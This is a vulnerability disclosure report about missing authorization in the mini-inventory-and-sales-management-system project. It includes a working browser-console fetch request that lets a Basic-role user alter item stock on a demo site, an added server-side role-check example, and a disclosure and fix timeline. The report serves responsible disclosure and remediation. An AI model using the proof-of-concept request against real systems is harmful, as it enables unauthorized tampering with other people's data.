Execution with Unnecessary Privileges in amirsanni/mini-inventory-and-sales-management-system


Reported on

Jul 31st 2021


Unprivileged user can update stock


1. From the admin account, go to https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators and add a new user called user-B with the Basic role.
2. Now log in to user-B's account; user-B cannot see any item.
3. Now user-B executes the JavaScript code below in the browser console, and it will update the stock:

// Run from user-B's browser console while logged in as user-B; the session cookie is sent automatically.
await fetch("https://1410inc.xyz/mini-inventory-and-sales-management-system/items/updatestock", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "https://1410inc.xyz/mini-inventory-and-sales-management-system/items",
    "body": "_iId=824&_upType=newStock&qty=1&desc=New+items+were+purchasedkk",
    "method": "POST",
    "mode": "cors"
});

In this request, change the _iId parameter value to the id of the item whose stock should be updated.


A user with the Basic role can update item stock.
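The root cause is an authorization check missing on the server: the UI hides items from a Basic user, but the items/updatestock handler accepts the POST anyway. The following is an added example, not the project's own code, of the kind of server-side gate that handler needs, written as a standalone JavaScript function; the parameter names and the Admin/Basic roles come from the report, while the session object shape and lowercase role strings are assumptions.

```javascript
// Added example (not from the original report or the project): a server-side
// authorization gate for the items/updatestock endpoint. Role names "admin" and
// "basic" and the parameter names come from the report; the session shape is assumed.
const ALLOWED_ROLES = new Set(["admin"]);        // roles permitted to change stock
const ALLOWED_UP_TYPES = new Set(["newStock"]);  // _upType values seen in the report

// Parse the application/x-www-form-urlencoded body exactly as the browser sends it.
function parseStockUpdate(body) {
  const p = new URLSearchParams(body);
  return {
    itemId: Number(p.get("_iId")),
    upType: p.get("_upType"),
    qty: Number(p.get("qty")),
    desc: p.get("desc") ?? "",
  };
}

// Decide whether this session may perform the requested stock update.
// Returns { allowed, status, reason } and, when allowed, the parsed update.
function authorizeStockUpdate(session, body) {
  if (!session || !session.userId) {
    return { allowed: false, status: 401, reason: "not authenticated" };
  }
  // The reported bug: the server never checked the role here, so a Basic user
  // who cannot see items in the UI could still POST a stock update.
  if (!ALLOWED_ROLES.has(session.role)) {
    return { allowed: false, status: 403, reason: `role '${session.role}' may not update stock` };
  }
  const req = parseStockUpdate(body);
  if (!Number.isInteger(req.itemId) || req.itemId <= 0) {
    return { allowed: false, status: 400, reason: "invalid _iId" };
  }
  if (!ALLOWED_UP_TYPES.has(req.upType)) {
    return { allowed: false, status: 400, reason: "invalid _upType" };
  }
  if (!Number.isInteger(req.qty) || req.qty <= 0) {
    return { allowed: false, status: 400, reason: "invalid qty" };
  }
  return { allowed: true, status: 200, reason: "ok", update: req };
}

// Constructed sample: the body from the report, replayed by a Basic user and by an admin.
const SAMPLE_BODY = "_iId=824&_upType=newStock&qty=1&desc=New+items+were+purchasedkk";
const basicUser = { userId: 2, role: "basic" };
const adminUser = { userId: 1, role: "admin" };
console.log(authorizeStockUpdate(basicUser, SAMPLE_BODY).status); // 403
console.log(authorizeStockUpdate(adminUser, SAMPLE_BODY).status); // 200
```

The check must run inside the handler itself, because hiding the items page from Basic users does nothing to stop a direct POST.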


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back a year ago
amirsanni/mini-inventory-and-sales-management-system maintainer validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir confirmed that a fix has been merged on ba36f6 a year ago
Amir has been awarded the fix bounty